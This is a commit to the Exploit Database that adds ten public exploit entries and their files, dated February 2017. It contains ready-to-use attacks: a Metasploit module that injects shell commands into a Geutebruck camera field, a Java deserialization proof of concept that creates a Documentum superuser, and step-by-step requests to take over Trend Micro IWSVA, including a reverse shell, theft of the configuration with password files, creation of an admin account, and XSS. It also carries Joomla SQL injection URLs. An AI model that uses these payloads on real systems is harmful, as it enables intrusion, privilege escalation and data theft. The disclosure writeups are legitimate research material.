DB: 2017-02-16

10 new exploits

Microsoft Windows gdi32.dll - EMR_SETDIBITSTODEVICE Heap-Based Out-of-Bounds Reads / Memory Disclosure
NVIDIA Driver 375.70 - DxgkDdiEscape 0x100008b Out-of-Bounds Read/Write
NVIDIA Driver 375.70 - Buffer Overflow in Command Buffer Submission
GOM Player 2.3.10.5266 - '.fpx' Denial of Service
Cisco ASA - WebVPN CIFS Handling Buffer Overflow

OpenText Documentum D2 - Remote Code Execution
Geutebruck 5.02024 G-Cam/EFD-2250 - Remote Command Execution (Metasploit)
Trend Micro InterScan Web Security Virtual Appliance (IWSVA) 6.5 - Multiple Vulnerabilities
Joomla! Component JoomBlog 1.3.1 - SQL Injection
Joomla! Component JSP Store Locator 2.2 - 'id' Parameter SQL Injection
This commit is contained in:
Offensive Security 2017-02-16 05:01:17 +00:00
parent 2f4b2745b1
commit d9f5d919c6
11 changed files with 715 additions and 0 deletions

View file

@ -5360,6 +5360,7 @@ id,file,description,date,author,platform,type,port
41222,platforms/windows/dos/41222.py,"Microsoft Windows 10 - SMBv3 Tree Connect (PoC)",2017-02-01,"laurent gaffie",windows,dos,0
41232,platforms/android/dos/41232.txt,"Google Android - 'rkp_set_init_page_ro' RKP Memory Corruption",2017-02-02,"Google Security Research",android,dos,0
41278,platforms/openbsd/dos/41278.txt,"OpenBSD HTTPd < 6.0 - Memory Exhaustion Denial of Service",2017-02-07,PierreKimSec,openbsd,dos,80
41363,platforms/windows/dos/41363.txt,"Microsoft Windows gdi32.dll - EMR_SETDIBITSTODEVICE Heap-Based Out-of-Bounds Reads / Memory Disclosure",2017-02-15,"Google Security Research",windows,dos,0
41350,platforms/linux/dos/41350.c,"Linux Kernel 3.10.0 (CentOS7) - Denial of Service",2017-02-12,FarazPajohan,linux,dos,0
41351,platforms/android/dos/41351.txt,"LG G4 - lgdrmserver Binder Service Multiple Race Conditions",2017-02-14,"Google Security Research",android,dos,0
41352,platforms/android/dos/41352.txt,"LG G4 - lghashstorageserver Directory Traversal",2017-02-14,"Google Security Research",android,dos,0
@ -5367,6 +5368,10 @@ id,file,description,date,author,platform,type,port
41354,platforms/android/dos/41354.txt,"Google Android - Inter-process munmap in android.util.MemoryIntArray",2017-02-14,"Google Security Research",android,dos,0
41355,platforms/android/dos/41355.txt,"Google Android - android.util.MemoryIntArray Ashmem Race Conditions",2017-02-14,"Google Security Research",android,dos,0
41357,platforms/windows/dos/41357.html,"Microsoft Edge - TypedArray.sort Use-After-Free (MS16-145)",2017-02-14,"Google Security Research",windows,dos,0
41364,platforms/windows/dos/41364.txt,"NVIDIA Driver 375.70 - DxgkDdiEscape 0x100008b Out-of-Bounds Read/Write",2017-02-15,"Google Security Research",windows,dos,0
41365,platforms/windows/dos/41365.txt,"NVIDIA Driver 375.70 - Buffer Overflow in Command Buffer Submission",2017-02-15,"Google Security Research",windows,dos,0
41367,platforms/windows/dos/41367.txt,"GOM Player 2.3.10.5266 - '.fpx' Denial of Service",2017-02-15,"Peter Baris",windows,dos,0
41369,platforms/hardware/dos/41369.txt,"Cisco ASA - WebVPN CIFS Handling Buffer Overflow",2017-02-15,"Google Security Research",hardware,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -15278,6 +15283,7 @@ id,file,description,date,author,platform,type,port
41297,platforms/multiple/remote/41297.rb,"HP Smart Storage Administrator 2.30.6.0 - Remote Command Injection (Metasploit)",2017-02-10,MaKyOtOx,multiple,remote,0
41298,platforms/hardware/remote/41298.txt,"F5 BIG-IP SSL Virtual Server - Memory Disclosure",2017-02-10,"Ege Balci",hardware,remote,0
41358,platforms/php/remote/41358.rb,"Piwik 2.14.0 / 2.16.0 / 2.17.1 / 3.0.1 - Superuser Plugin Upload (Metasploit)",2017-02-14,Metasploit,php,remote,80
41366,platforms/java/remote/41366.java,"OpenText Documentum D2 - Remote Code Execution",2017-02-15,"Andrey B. Panfilov",java,remote,0
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -37278,3 +37284,7 @@ id,file,description,date,author,platform,type,port
41346,platforms/php/webapps/41346.txt,"Joomla! Component JE Ticket System 1.2 - SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0
41347,platforms/php/webapps/41347.txt,"Joomla! Component JE Messanger - SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0
41359,platforms/php/webapps/41359.txt,"Itech B2B Script 4.29 - Multiple Vulnerabilities",2017-02-12,"Marc Castejon",php,webapps,0
41360,platforms/hardware/webapps/41360.rb,"Geutebruck 5.02024 G-Cam/EFD-2250 - Remote Command Execution (Metasploit)",2017-02-15,RandoriSec,hardware,webapps,0
41361,platforms/hardware/webapps/41361.txt,"Trend Micro InterScan Web Security Virtual Appliance (IWSVA) 6.5 - Multiple Vulnerabilities",2016-11-28,SlidingWindow,hardware,webapps,0
41362,platforms/php/webapps/41362.txt,"Joomla! Component JoomBlog 1.3.1 - SQL Injection",2017-02-15,"Ihsan Sencan",php,webapps,0
41368,platforms/php/webapps/41368.txt,"Joomla! Component JSP Store Locator 2.2 - 'id' Parameter SQL Injection",2017-02-15,"Ihsan Sencan",php,webapps,0

Can't render this file because it is too large.

View file

@ -0,0 +1,63 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=998
The WebVPN http server exposes a way of accessing files from CIFS with a url hook of the form: https://portal/+webvpn+/CIFS_R/share_server/share_name/file.
When someone logged into the portal navigates to such an address, the http_cifs_process_path function parses the request URI and creates 2 C strings in a http_cifs_context struct:
http_cifs_context:
+0x160 char* file_dir
+0x168 char* file_name
These strings are copied in various places, but is done incorrectly. For example, in ewaURLHookCifs, there is the following pseudocode:
filename_copy_buf = calloc(1LL, 336LL);
net_handle[10] = filename_copy_buf;
if ( filename_copy_buf )
{
src_len = _wrap_strlen(filename_from_request);
if ( filename_from_request[src_len - 1] == ('|') )
{
// wrong length (src length)
strncpy((char *)filename_copy_buf, filename_from_request,
src_len - 1);
}
In this case, a fixed size buf (|filename_copy_buf|) is allocated. Later, strncpy is called to copy to it, but the length passed is the length of the src string, which can be larger than 366 bytes. This leads to heap overflow.
There appear to be various other places where the copying is done in an unsafe way:
http_cifs_context_to_name, which is called from ewaFile{Read,Write,Get}Cifs, and ewaFilePost, uses strcat to copy the file path and file name to a fixed size (stack) buffer.
http_cifs_pre_fopen, which has a similar issue with passing the length of the src buffer to strncpy.
Possibly http_add_query_str_from_context. There are probably others that I missed.
Note that triggering this bug requires logging in to the WebVPN portal first, but the cifs share does not need to exist.
Repro:
Login to WebVPN portal, navigate to:
https://portal/+webvpn+/CIFS_R/server/name/ followed by 500 'A's.
("server" and "name" may be passed verbatim)
*** Error in `lina': malloc(): memory corruption: 0x00007fa40c53f570 ***
======= Backtrace: =========
/lib64/libc.so.6(+0x3f0486e74f)[0x7fa4139fc74f]
/lib64/libc.so.6(+0x3f048783ee)[0x7fa413a063ee]
/lib64/libc.so.6(+0x3f0487be99)[0x7fa413a09e99]
/lib64/libc.so.6(__libc_malloc+0x60)[0x7fa413a0b5a0]
lina(+0x321976a)[0x7fa41a2b276a]
lina(mem_mh_calloc+0x123)[0x7fa41a2b4c83]
lina(resMgrCalloc+0x100)[0x7fa419659410]
lina(calloc+0x94)[0x7fa419589a34]
lina(ewsFileSetupFilesystemDoc+0x28)[0x7fa41826a608]
lina(ewsServeFindDocument+0x142)[0x7fa418278192]
lina(ewsServeStart+0x114)[0x7fa4182784a4]
lina(ewsParse+0x19a0)[0x7fa418272cc0]
lina(ewsRun+0x9c)[0x7fa41826955c]
lina(emweb_th+0x6ab)[0x7fa418286aeb]
lina(+0xde58ab)[0x7fa417e7e8ab]
This was tested on 9.6(2)

View file

@ -0,0 +1,74 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Geutebruck testaction.cgi Remote Command Execution',
'Description' => %q{
This module exploits a an arbitrary command execution vulnerability. The
vulnerability exists in the /uapi-cgi/viewer/testaction.cgi page and allows an
anonymous user to execute arbitrary commands with root privileges.
Firmware <= 1.11.0.12 are concerned.
Tested on 5.02024 G-Cam/EFD-2250 running 1.11.0.12 firmware.
},
'Author' =>
[
'Davy Douhine', #CVE-2017-5173 (RCE) and metasploit module
'Florent Montel' #CVE-2017-5174 (Authentication bypass)
'Frederic Cikala' #CVE-2017-5174 (Authentication bypass)
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2017-5173' ],
[ 'CVE', '2017-5174' ],
[ 'URL', 'http://geutebruck.com' ]
[ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-17-045-02' ]
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
'Space' => 1024,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic netcat bash',
}
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' => [[ 'Automatic', { }]],
'DefaultTarget' => 0,
'DisclosureDate' => 'Aug 16 2016'))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to webapp', '/uapi-cgi/viewer/testaction.cgi']),
], self.class)
end
def exploit
uri = normalize_uri(target_uri.path)
print_status("#{rhost}:#{rport} - Attempting to exploit...")
command = payload.encoded
res = send_request_cgi(
{
'uri' => uri,
'method' => 'POST',
'vars_post' => {
'type' => "ip",
'ip' => "eth0 1.1.1.1;#{command}",
},
})
end
end

View file

@ -0,0 +1,154 @@
# Exploit Title: [Trend Micro Interscan Web Security Virtual Appliance (IWSVA) 6.5.x Multiple Vulnerabilities]
# Date: [28/11/2016]
# Exploit Author: [SlidingWindow] , Twitter: @Kapil_Khot
# Vendor Homepage: [http://www.trendmicro.com/us/enterprise/network-security/interscan-web-security/virtual-appliance/]
# Version: [Tested on IWSVA version 6.5-SP2_Build_Linux_1707 and prior versions in 6.5.x series. Older versions may also be affected]
# Tested on: [IWSVA version 6.5-SP2_Build_Linux_1707]
# CVE : [CVE-2016-9269, CVE-2016-9314, CVE-2016-9315, CVE-2016-9316]
# Vendor Security Bulletin: https://success.trendmicro.com/solution/1116672
==================
#Product:-
==================
Trend Micro InterScan Web Security Virtual Appliance (IWSVA) is a secure web gateway that combines application control with zero-day exploit detection, advanced anti-malware and ransomware scanning, real-time web reputation, and flexible URL filtering to provide superior Internet threat protection.
==================
#Vulnerabilities:-
==================
Remote Command Execution, Sensitive Information Disclosure, Privilege Escalation and Stored Cross-Site-Scripting (XSS)
========================
#Vulnerability Details:-
========================
#1. Remote Command Execution Vulnerability (CVE-2016-9269):-
The Trend Micro IWSVA can be managed through a web based management console which runs on port#1812. A least privileged user who could just run reports, can run commands on the server as root and gain a root shell.
Proof of Concept:-
a. Download the patch from here.
b. Edit the 'startgate_patch_apply.sh' and add your Kali machine ip to get reverse shell.
c. Calculate the MD5 hash of 'stargate_patch.tgz'
md5sum stargate_patch.tgz
d. Update the 'MD5SUM.txt' with new hash.
e. Listen on port#443 on you Kali machine.
f. Upload the patch to the target server:
http://target_server:1812/servlet/com.trend.iwss.gui.servlet.ManagePatches?action=upload
g. You should have a root shell now.
#2. Sensitive Information Disclosure Vulnerability (CVE-2016-9314):-
The web management console allows administrators to backup and download current configuration of the appliance to their local machine. A low privileged user can abuse the ConfigBackup functionality to backup system configuration and download it on his local machine. This backup file contains sensitive information like passwd/shadow files, RSA certificates, Private Keys and Default Passphrase etc.
Exploitation:-
A. Send following POST request to the target:
(Replace JSESSIONID and CSRFGuardToken with the ones from your current low privileged user's session)
POST /servlet/com.trend.iwss.gui.servlet.ConfigBackup?action=export HTTP/1.1
Host: <Target_IP>:1812
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=<Low_Privileged_Users_Session_ID>
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
CSRFGuardToken=<Low_Privileged_Users_CSRF_TOKEN>&op=save&uploadfile=&beFullyOrPartially=0
B. Send this POST request to download the backup file from server:
POST /servlet/com.trend.iwss.gui.servlet.ConfigBackup?action=download HTTP/1.1
Host: <Target_IP>:1812
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=<Low_Privileged_Users_Session_ID>
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
CSRFGuardToken=<Low_Privileged_Users_CSRF_TOKEN>&op=2&ImEx_success=1&pkg_name=%2Fvar%2Fiwss%2Fmigration%2Fexport%2FIWSVA6.5-SP2_Config.tar%0D%0A&backup_return=
#3. Privilege Escalation Vulnerability (CVE-2016-9315):-
A. Change Master Admin's password:
i. Send following POST request to the target:
(Replace JSESSIONID and CSRFGuardToken with the ones from your current low privileged user's session)
POST /servlet/com.trend.iwss.gui.servlet.updateaccountadministration HTTP/1.1
Host: <Target_IP>:1812
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=<Low_Privileged_Users_Session_ID>
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
CSRFGuardToken=<Low_Privileged_Users_CSRF_TOKEN>&accountop=review&allaccount=admin&allaccount=hacker2&allaccount=hacker4&allaccount=hacker&allaccount=test&accountname=admin&commonname=admin&accounttype=0&password_changed=true&PASS1=abc123&PASS2=abc123&description=Master+Administrator&role_select=0&roleid=0
B. Add a new administrator account 'hacker'
i. Send following POST request to the target:
(Replace JSESSIONID and CSRFGuardToken with the ones from your current low privileged user's session)
POST /servlet/com.trend.iwss.gui.servlet.updateaccountadministration HTTP/1.1
Host: <Target_IP>:1812
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=<Low_Privileged_Users_Session_ID>
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
CSRFGuardToken=<Low_Privileged_Users_CSRF_TOKEN>&accountop=add&allaccount=admin&accountType=local&accountnamelocal=hacker&accounttype=0&password_changed=true&PASS1=pass1234&PASS2=pass1234&description=hackerUser&role_select=1&roleid=1
#4. Stored Cross-Site-Scripting Vulnerability (CVE-2016-9316):-
i. Send following POST request to the target:
(Replace JSESSIONID and CSRFGuardToken with the ones from your current low privileged user's session)
POST /servlet/com.trend.iwss.gui.servlet.updateaccountadministration HTTP/1.1
Host: <Target_IP>:1812
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=<Low_Privileged_Users_Session_ID>
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 292
CSRFGuardToken=<Low_Privileged_Users_CSRF_TOKEN>&accountop=add&allaccount=admin&accountType=local&accountnamelocal=hacker4"><script>alert(111)</script>&accounttype=0&password_changed=true&PASS1=pass1234&PASS2=pass1234&description=hackerUser4"><script>alert(111)</script>&role_select=1&roleid=1
ii. The script executes when admin visits the Login Accounts page.
#Vulnerability Disclosure Timeline:
28/10/2016: First email to disclose the vulnerability to the Trend Micro incident response team
10/11/2016: Second email to ask for acknowledgment
15/11/2016 Acknowledgment from the Trend Micro incident response team for the email reception and saying the vulnerability is under investigation
15/11/2016: CVE Mitre assigned CVE-2016-9269, CVE-2016-9314, CVE-2016-9315 and CVE-2016-9316 for these vulnerabilities.
24/11/2016: Trend Micro incident response team provided a patch for testing.
25/11/2016: Acknowlegdement sent to Trend Micro confirming the fix.
01/12/2016: Third email to ask for remediation status
02/12/2016: Trend Micro incident response team responded stating that the fix will be released by the end of December 2016.
21/12/2016: Fourth email to ask for remediation status
21/12/2016: Trend Micro released the patch for English version.
21/12/2016: Trend Micro incident response team responded stating that the patch for Japanese version will be released in February 2017.
14/02/2017: Trend Micro releases Security Advisory. Link: https://success.trendmicro.com/solution/1116672

147
platforms/java/remote/41366.java Executable file
View file

@ -0,0 +1,147 @@
/**
CVE Identifier: CVE-2017-5586
Vendor: OpenText
Affected products: Documentum D2 version 4.x
Researcher: Andrey B. Panfilov
Severity Rating: CVSS v3 Base Score: 10.0 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
Description: Document D2 contains vulnerable BeanShell (bsh) and Apache Commons libraries and accepts serialised data from untrusted sources, which leads to remote code execution
Proof of concept:
===================================8<===========================================
*/
import java.io.ByteArrayOutputStream;
import java.io.DataOutputStream;
import java.io.InputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.net.HttpURLConnection;
import java.net.URL;
import java.util.ArrayList;
import java.util.Comparator;
import java.util.List;
import java.util.PriorityQueue;
import bsh.Interpreter;
import bsh.XThis;
import com.documentum.fc.client.content.impl.ContentStoreResult;
import com.documentum.fc.client.impl.typeddata.TypedData;
/**
* @author Andrey B. Panfilov <andrey (at) panfilov (dot) tel [email concealed]>
*
* Code below creates superuser account in underlying Documentum repository
* usage: java DocumentumD2BeanShellPoc http://host:port/D2 <docbase_name> <user_name_to_create>
*
*/
@SuppressWarnings("unchecked")
public class DocumentumD2BeanShellPoc {
public static void main(String[] args) throws Exception {
String url = args[0];
String docbase = args[1];
String userName = args[2];
String payload = "compare(Object foo, Object bar) {new Interpreter()"
+ ".eval(\"try{com.documentum.fc.client.IDfSession session = com.documentum.fc.impl.RuntimeContext.getInstance()"
+ ".getSessionRegistry().getAllSessions().iterator().next();"
+ "session=com.emc.d2.api.D2Session.getAdminSession(session, false);"
+ "com.documentum.fc.client.IDfQuery query = new com.documentum.fc.client.DfQuery("
+ "\\\"CREATE dm_user object set user_name='%s',set user_login_name='%s',set user_source='inline password', "
+ "set user_password='%s', set user_privileges=16\\\");query.execute(session, 3);} "
+ "catch (Exception e) {}; return 0;\");}";
Interpreter interpreter = new Interpreter();
interpreter.eval(String.format(payload, userName, userName, userName));
XThis x = new XThis(interpreter.getNameSpace(), interpreter);
Comparator comparator = (Comparator) x.getInterface(new Class[] { Comparator.class, });
PriorityQueue<Object> priorityQueue = new PriorityQueue<Object>(2, comparator);
Object[] queue = new Object[] { 1, 1 };
setFieldValue(priorityQueue, "queue", queue);
setFieldValue(priorityQueue, "size", 2);
// actually we may send priorityQueue directly, but I want to hide
// deserialization stuff from stacktrace :)
Class cls = Class.forName("com.documentum.fc.client.impl.typeddata.ValueHolder");
Constructor ctor = cls.getConstructor();
ctor.setAccessible(true);
Object valueHolder = ctor.newInstance();
setFieldValue(valueHolder, "m_value", priorityQueue);
List valueHolders = new ArrayList();
valueHolders.add(valueHolder);
TypedData data = new TypedData();
setFieldValue(data, "m_valueHolders", valueHolders);
ContentStoreResult result = new ContentStoreResult();
setFieldValue(result, "m_attrs", data);
ByteArrayOutputStream baos = new ByteArrayOutputStream();
DataOutputStream dos = new DataOutputStream(baos);
for (Character c : "SAVED".toCharArray()) {
dos.write(c);
}
dos.write((byte) 124);
dos.flush();
ObjectOutputStream oos = new ObjectOutputStream(baos);
oos.writeObject(result);
oos.flush();
byte[] bytes = baos.toByteArray();
baos = new ByteArrayOutputStream();
dos = new DataOutputStream(baos);
dos.writeInt(bytes.length);
dos.write(bytes);
dos.flush();
HttpURLConnection conn = (HttpURLConnection) new URL(makeUrl(url)).openConnection();
conn.setRequestProperty("Content-Type", "application/octet-stream");
conn.setRequestMethod("POST");
conn.setUseCaches(false);
conn.setDoOutput(true);
conn.getOutputStream().write(baos.toByteArray());
conn.connect();
System.out.println("Response code: " + conn.getResponseCode());
InputStream stream = conn.getInputStream();
byte[] buff = new byte[1024];
int count = 0;
while ((count = stream.read(buff)) != -1) {
System.out.write(buff, 0, count);
}
}
public static String makeUrl(String url) {
if (!url.endsWith("/")) {
url += "/";
}
return url + "servlet/DoOperation?origD2BocsServletName=Checkin&id=1&file=/etc/passwd
&file_length=1000"
+ "&_username=dmc_wdk_preferences_owner&_password=webtop";
}
public static Field getField(final Class<?> clazz, final String fieldName) throws Exception {
Field field = clazz.getDeclaredField(fieldName);
if (field == null && clazz.getSuperclass() != null) {
field = getField(clazz.getSuperclass(), fieldName);
}
field.setAccessible(true);
return field;
}
public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {
final Field field = getField(obj.getClass(), fieldName);
field.set(obj, value);
}
}
/**
===================================>8===========================================
Disclosure timeline:
2016.02.28: Vulnerability discovered
2017.01.25: CVE Identifier assigned
2017.02.01: Vendor contacted, no response
2017.02.15: Public disclosure
*/

17
platforms/php/webapps/41362.txt Executable file
View file

@ -0,0 +1,17 @@
# # # # #
# Exploit Title: Joomla! Component JoomBlog v1.3.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_joomblog
# Date: 15.02.2017
# Vendor Homepage: http://joomplace.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/authoring-a-content/blog/joomblog/
# Demo: http://demo30.joomplace.com/our-products/joomblog/
# Version: 1.3.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_joomblog&task=tag&tag=Ihsan_Sencan[SQL]
# # # # #

20
platforms/php/webapps/41368.txt Executable file
View file

@ -0,0 +1,20 @@
# # # # #
# Exploit Title: Joomla! Component JSP Store Locator v2.2 - SQL Injection
# Google Dork: inurl:index.php?option=com_jsplocation
# Date: 15.02.2017
# Vendor Homepage: http://joomlaserviceprovider.com
# Software Buy: https://extensions.joomla.org/extensions/extension/maps-a-weather/maps-a-locations/jsplocation/
# Demo: http://demo.joomlaserviceprovider.com/index.php/joomla/extensions/jsp-location-classic-theme
# Version: 2.2
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_jsplocation&task=directionview&id=[SQL]
# http://localhost/[PATH]/index.php?option=com_jsplocation&task=redirectviewinfo&id=[SQL]
# http://localhost/[PATH]/index.php?option=com_jsplocation&view=classic&task=redirectviewinfo&id=[SQL]
# Etc...
# # # # #

31
platforms/windows/dos/41363.txt Executable file
View file

@ -0,0 +1,31 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=992
In issue #757, I described multiple bugs related to the handling of DIBs (Device Independent Bitmaps) embedded in EMF records, as implemented in the user-mode Windows GDI library (gdi32.dll). As a quick reminder, the DIB-embedding records follow a common scheme: they include four fields, denoting the offsets and lengths of the DIB header and DIB data (named offBmiSrc, cbBmiSrc, offBitsSrc, cbBitsSrc). A correct implementation should verify that:
1) cbBmiSrc is within expected bounds, accounting for the DIB header, color palette etc.
2) the (offBmiSrc, offBmiSrc + cbBmiSrc) region resides within the record buffer's area.
3) cbBitsSrc is within expected bounds, and especially that it is larger or equal the expected number of bitmap bytes.
4) the (offBitsSrc, offBitsSrc + cbBitsSrc) region resides within the record buffer's area.
In the previous bug, I listed various combinations of missing checks in at least 10 different records:
- EMR_ALPHABLEND
- EMR_BITBLT
- EMR_MASKBLT
- EMR_PLGBLT
- EMR_STRETCHBLT
- EMR_TRANSPARENTBLT
- EMR_SETDIBITSTODEVICE
- EMR_STRETCHDIBITS
- EMR_CREATEMONOBRUSH
- EMR_EXTCREATEPEN
As part of MS16-074, some of the bugs were indeed fixed, such as the EMR_STRETCHBLT record, which the original proof-of-concept image relied on. However, we've discovered that not all of the DIB-related problems are gone. For instance, the implementation of EMR_SETDIBITSTODEVICE (residing in the MRSETDIBITSTODEVICE::bPlay function) still doesn't enforce condition #3. As a result, it is possible to disclose uninitialized or out-of-bounds heap bytes via pixel colors, in Internet Explorer and other GDI clients which allow the extraction of displayed image data back to the attacker.
The proof-of-concept file attached here consists of a single EMR_SETDIBITSTODEVICE record (excluding the header/EOF records), which originally contained a 1x1 bitmap. The dimensions of the DIB were then manually altered to 16x16, without adding any more actual image data. As a consequence, the 16x16/24bpp bitmap is now described by just 4 bytes, which is good for only a single pixel. The remaining 255 pixels are drawn based on junk heap data, which may include sensitive information, such as private user data or information about the virtual address space. I have confirmed that the vulnerability reproduces both locally in Internet Explorer, and remotely in Office Online, via a .docx document containing the specially crafted EMF file.
It is strongly advised to perform a careful audit of all EMF record handlers responsible for dealing with DIBs, in order to make sure that each of them correctly enforces all four conditions necessary to prevent invalid memory access (and subsequent memory disclosure) while processing the bitmaps.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41363.zip

41
platforms/windows/dos/41364.txt Executable file
View file

@ -0,0 +1,41 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=985
The DxgkDdiEscape handler for 0x100008b accepts a user supplied size as the
limit for a loop, leading to OOB reads and writes.
The supplied PoC passes an invalid size of 0x41414141, which causes a crash in:
__int64 sub_30A500(__int64 a1, __int64 a2, _DWORD *ptr, unsigned int user_supplied_size)
{
__int64 i; // r11@2
if ( user_supplied_size )
{
i = user_supplied_size;
do
{
if ( *ptr == 3 || (unsigned int)(*ptr - 9) <= 1 )
*ptr = 0;
ptr += 3;
--i;
}
while ( i );
Crashing context on Win 10 x64, driver version 375.70:
TRAP_FRAME: ffffd000266219e0 -- (.trap 0xffffd000266219e0)
NOTE: The trap frame does not contain all registers.
Some register values may be zeroed or incorrect.
rax=00000000fffffff7 rbx=0000000000000000 rcx=ffffe000d6315000
rdx=ffffe000d691b000 rsi=0000000000000000 rdi=0000000000000000
rip=fffff8010e34a50b rsp=ffffd00026621b78 rbp=ffffe000d691b000
r8=ffffd000266228a8 r9=0000000041414141 r10=ffffd00026623004
r11=00000000414140a4 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei pl nz na pe nc
nvlddmkm+0x2fa50b:
fffff801`0e34a50b 418b02 mov eax,dword ptr [r10] ds:ffffd000`26623004=????????
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41364.zip

77
platforms/windows/dos/41365.txt Executable file
View file

@ -0,0 +1,77 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1012
DxgkDdiSubmitCommandVirtual is the function implemented by the kernel mode driver
responsible for submitting a command buffer to the GPU. One of the arguments passed
contains vendor specific data from the user mode driver. The kernel allocates a single
buffer for this purpose for all submit calls for the same context.
NVIDIA implements this data as:
struct NvPrivateHeader {
DWORD magic;
WORD unknown_4;
WORD unknown_6;
DWORD unknown_8;
DWORD size;
};
struct NvPrivateData {
NvPrivateHeader header;
DWORD unknown_0;
DWORD unknown_1;
DWORD some_size;
DWORD unknown_2;
PVOID a_gpu_address_maybe;
BYTE unknown[1220];
};
In one of the functions that process this data, there appears to be code to
shift around the contents of this user private data.
// |len| is controlled by the user. can come from the |some_size| field if the
|a_gpu_address_maybe| field is 0.
if ( len ) {
if ( 8 * len >= pCommand_->DmaBufferPrivateDataSize - 0x4E8 )
do_debug_thingo(); // doesn't stop the memcpy
priv_data = (NvSubmitPrivateData *)pCommand_->pDmaBufferPrivateData;
src = (char *)priv_data + priv_data->header.size; // unchecked length
priv_data = (NvSubmitPrivateData *)((char *)priv_data + 1256);
*(_QWORD *)&v4->unknown_0[256] = priv_data;
// potential bad memcpy
memcpy(priv_data, src, 8 * len);
}
There are two main problems here: the |len| value is checked, but that appears
to only call a debug logging function and not actually stop the memcpy that
occurs afterwards.
Also, the |size| field from the header is not properly
checked to be smaller than the actual size of the data (this is also checked in
the calling function but once again only calls do_debug_thingo()).
This lets an attacker specify an arbitrary length for the copy, as well as
specify an arbitrary 32-bit offset to copy from, leading to pool memory corruption.
Crashing context with PoC (Win 10 x64, driver version 375.95):
PAGE_FAULT_IN_NONPAGED_AREA (50)
...
rax=0000000000000008 rbx=0000000000000000 rcx=ffffb2087fe8f4f0
rdx=0000000041413c59 rsi=0000000000000000 rdi=0000000000000000
